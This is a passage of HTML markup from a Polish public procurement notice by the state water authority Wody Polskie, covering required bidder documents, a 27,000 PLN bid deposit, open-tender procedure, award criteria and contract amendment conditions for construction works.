id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeliodrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstawwykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy. Wykonawca nie jest zobowiązany do złożeniaprzedmiotowego dokumentu, jeżeli Zamawiający może go uzyskać za pomocą bezpłatnych iogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, aWykonawca wskaże w ofercie adres internetowy skąd Zamawiający ma go pobrać.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1. wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wszczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotamibudowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczeniai wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanychprzez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (zgodny w treści zZałącznikiem Nr 6 do SIWZ); 2. wykaz robót budowlanych wykonanych nie wcześniej niż w okresieostatnich 8 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jestkrótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania ipodmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czyte roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostaływykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami,o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz któregoroboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterzewykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty (zgodny w treści zZałącznikiem Nr 7 do SIWZ);</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Formularz oferty zgodny w treści z Załącznikiem Nr 1 do SIWZ 2.dokumenty potwierdzająceuprawnienie do podpisania oferty oraz do podpisania lub poświadczenia za zgodność z oryginałemskładanych oświadczeń lub dokumentów. Jeżeli odrębne przepisy wymagają wpisu do rejestru lubewidencji dokumentem właściwym jest odpis z właściwego rejestru lub z centralnej ewidencji iinformacji o działalności gospodarczej lub dokumenty na podstawie których dokonuje się wpisu dowłaściwego rejestru lub ewidencji, np. uchwała właściwego organu Wykonawcy; 3.pełnomocnictwo,w przypadku, gdy ofertę lub załączone do niej oświadczenia lub dokumenty podpisuje pełnomocnik;4.dokument potwierdzający wniesienie wadium w przypadku wnoszenia wadium w formieniepieniężnej (o ile jest wymagane wadium); 5.oświadczenie Wykonawcy o braku podstaw dowykluczenia oraz o spełnieniu warunków udziału w postępowaniu (zgodne w treści z Załącznikiem Nr2 i Załącznikiem nr 3 do SIWZ), aktualne na dzień składania ofert, celem wstępnego potwierdzenia, żeWykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 oraz ust. 5 pkt 1ustawy Pzp oraz spełnia warunki udziału w postępowaniu określone w SIWZ. W przypadkuwspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie Wykonawcy o brakupodstaw do wykluczenia oraz o spełnieniu warunków udziału w postępowaniu składa każdy zWykonawców wspólnie ubiegających się o zamówienie. 6.oświadczenie Wykonawcy o braku podstawdo wykluczenia oraz o spełnieniu warunków udziału w postępowaniu (zgodne w treści z ZałącznikiemNr 2 i Załącznikiem nr 3 do SIWZ), aktualne na dzień składania ofert, dotyczące innych podmiotów,na których zasoby powołuje się Wykonawca, celem wstępnego wykazania braku istnienia wobec nichpodstaw wykluczenia oraz spełniania, w zakresie, w jakim Wykonawca powołuje się na ich zasoby,warunków udziału w postępowaniu; 7.dowód potwierdzający, że Wykonawca realizując zamówieniebędzie dysponował niezbędnymi zasobami innych podmiotów, który stanowi w szczególnościzobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów napotrzeby realizacji zamówienia – wzór stanowi Załącznik nr 4 do SIWZ 8. oświadczenie oprzynależności albo braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia16 lutego 2007 r. o ochronie konkurencji i konsumentów, o której mowa w art. 24 ust. 1 pkt 23 ustawyPzp - składa się bez wezwania w terminie 3 dni od dnia zamieszczenia na stronie internetowejZamawiającego informacji z otwarcia ofert; 9.Wykonawcy składający ofertę wspólną: a)Wykonawcywystępujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich wpostępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawieprzedmiotowego zamówienia publicznego b) Każdy z Wykonawców wspólnie ubiegających się ozamówienie składa oświadczenie Wykonawcy o braku podstaw do wykluczenia oraz o spełnieniuwarunków udziału w postępowaniu (zgodne w treści z Załącznikiem Nr 2 i Załącznikiem nr 3 doSIWZ), aktualne na dzień składania ofert, celem wstępnego potwierdzenia, że każdy z Wykonawcówubiegających się wspólnie o zamówienie nie podlega wykluczeniu z postępowania na podstawie art.24 ust. 1 oraz ust. 5 pkt 1 ustawy Pzp oraz spełnia warunki udziału w postępowaniu określone w SIWZw zakresie, w którym każdy z nich wykazuje brak podstaw wykluczenia z postępowania oraz spełniawarunki udziału w postępowaniu. c) Każdy z Wykonawców występujących wspólnie obowiązany jestdo wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego.W takim przypadku odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalnościgospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzeniabraku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy oraz oświadczenie oprzynależności albo braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia16 lutego 2007 r. o ochronie konkurencji i konsumentów, o której mowa w art. 24 ust. 1 pkt 23 ustawyPzp skłąda każdy z wykonawców oddzielnie 10. Wykonawcy zagraniczni: a) Jeżeli Wykonawca masiedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, októrych mowa w pkt 2 zdanie 2 w sekcji III punkt 7 ogłoszenia – składa dokument lub dokumentywystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania wskazujące sposóbreprezentacji Wykonawcy oraz osoby uprawnione do reprezentowania Wykonawcy. Dokument, októrym mowa powyżej powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływemterminu składania ofert. b) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejscezamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje siędokumentu, o którym mowa w pkt 10.a (powyżej), zastępuje się go dokumentem zawierającymodpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jegoreprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lubprzed organem sądowym, administracyjnym albo organem samorządu zawodowego lubgospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejscezamieszkania tej osoby. Postanowienia pkt 10.a (powyżej odnoszące się do wymaganego terminuważności dokumentu stosuje się.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Wykonawca zobowiązany jest, przed upływem terminu składania ofert, wnieść wadium w kwocie 27000,00 PLN ( słownie: dwadzieścia siedem tysięcy złotych). 8.2 Wadium może być wnoszone wjednej lub kilku następujących formach: 8.2.1 pieniądzu; 8.2.2 poręczeniach bankowych lubporęczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawszeporęczeniem pieniężnym; 8.2.3 gwarancjach bankowych; 8.2.4 gwarancjach ubezpieczeniowych; 8.2.5poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 8.3 Dokumentpotwierdzający wniesienie wadium w jednej z form wymienionych w pkt 8.2.2-8.2.5 SIWZ musi być załączony do oferty w formie oryginału. Beneficjentem takich dokumentów musi być Państwowe Gospodarstwo Wodne Wody Polskie Krajowy Zarząd Gospodarki Wodnej, ul. Grzybowska 80/82 00-844 Warszawa.W przypadku wnoszenia wadium w pieniądzu kwotę należy wpłacić przelewem na rachunek bankowy Zamawiającego prowadzony przez Bank Gospodarstwa Krajowego Nr: 70 1130 1017 0020 1510 6790 0006 W tytule przelewu należy wpisać: „wadium w sprawie nr SZ.ROZ.2810.28.2020”</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Doświadczenie osób skierowanych od realizacji zamówienia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zmiany treści Umowy wymagają formy pisemnej pod rygorem nieważności. 2. Dokonanie zmianyUmowy dopuszczalne jest w następujących sytuacjach: 1) Strony mają prawo zmiany terminu wykonaniaPrzedmiotu Umowy o okres trwania przyczyn, z powodu których dotrzymanie pierwotnego terminuwykonania Przedmiotu Umowy stanie się niemożliwe, w następujących sytuacjach: a) jeżeli przyczyny, zpowodu których będzie zagrożone dotrzymanie terminu wykonania Przedmiotu Umowy lub jego częścibędzie następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności będąnastępstwem nieterminowego przekazania Terenu budowy, konieczności zmian Dokumentacjiprojektowej w zakresie, w jakim ww. okoliczności miały lub będą mogły mieć wpływ na dotrzymanieterminu wykonania Przedmiotu Umowy, przerwania robót przez Zamawiającego; b) gdy wystąpiąniekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót, w szczególności zpowodu technologii realizacji prac określonej: umową, normami lub innymi przepisami, wymagającejkonkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jestnastępstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, c) gdy wystąpi koniecznośćwykonania robót zamiennych lub innych robót niezbędnych do wykonania Przedmiotu Umowy zewzględu na zasady wiedzy technicznej, oraz udzielenia zamówień, które wstrzymują lub opóźniająrealizację Przedmiotu Umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegleprowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięciatych kolizji, d) wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przezwłaściwe organy administracji, które nie są następstwem okoliczności, za które Wykonawca ponosiodpowiedzialność, e) gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., dowydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienieprzekroczy okres, przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraznie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, f) jeżeli wystąpi brakmożliwości wykonywania robót z powodu nie dopuszczania do ich wykonywania przez uprawnionyorgan lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy,g) wystąpienia siły wyższej uniemożliwiającej wykonanie Przedmiotu Umowy zgodnie z jejpostanowieniami, h) wystąpienia konieczności wykonania robót dodatkowych, i) wystąpieniaokoliczności, o których mowa w pkt 2 niniejszego ustępu. 2) Wykonawca jest uprawniony do żądaniazmiany Umowy w zakresie materiałów, parametrów technicznych, technologii wykonania robótbudowlanych, sposobu i zakresu wykonania Przedmiotu Umowy w następujących sytuacjach: a)konieczności zrealizowania jakiejkolwiek części robót, objętej Przedmiotem Umowy, przy zastosowaniuodmiennych rozwiązań technicznych lub technologicznych, niż wskazane w dokumentacji projektowej, awynikających ze stwierdzonych wad tej dokumentacji lub zmiany stanu prawnego w oparciu, o który jąprzygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytymwykonaniem Przedmiotu Umowy, b) konieczności realizacji robót wynikających z wprowadzenia wDokumentacji projektowej zmian uznanych za nieistotne odstępstwo od projektu budowlanego,wynikających z art. 36a ust. 1 Prawa Budowlanego, c) wystąpienia warunków geologicznych,geotechnicznych lub hydrologicznych odbiegających w sposób istotny od przyjętych w Dokumentacjiprojektowej, rozpoznania terenu w zakresie znalezisk archeologicznych, występowania niewybuchów lubniewypałów, które mogą skutkować w świetle dotychczasowych założeń niewykonaniem lubnienależytym wykonaniem przedmiotu Umowy, d) wystąpienia warunków Terenu budowy odbiegającychw sposób istotny od przyjętych w Dokumentacji projektowej, w szczególności napotkanianiezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektówbudowlanych, e) konieczności zrealizowania Przedmiotu Umowy przy zastosowaniu innych rozwiązańtechnicznych lub materiałowych ze względu na zmiany obowiązującego prawa, f) wystąpienianiebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmiotyinwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji, g) wystąpienia Siływyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami. 3)Zamawiający jest uprawniony do żądania zmiany sposobu rozliczania Umowy lub dokonywania płatnościna rzecz Wykonawcy w związku ze zmianami zawartej przez Zamawiającego umowy o dofinansowanieprojektu lub zmianami 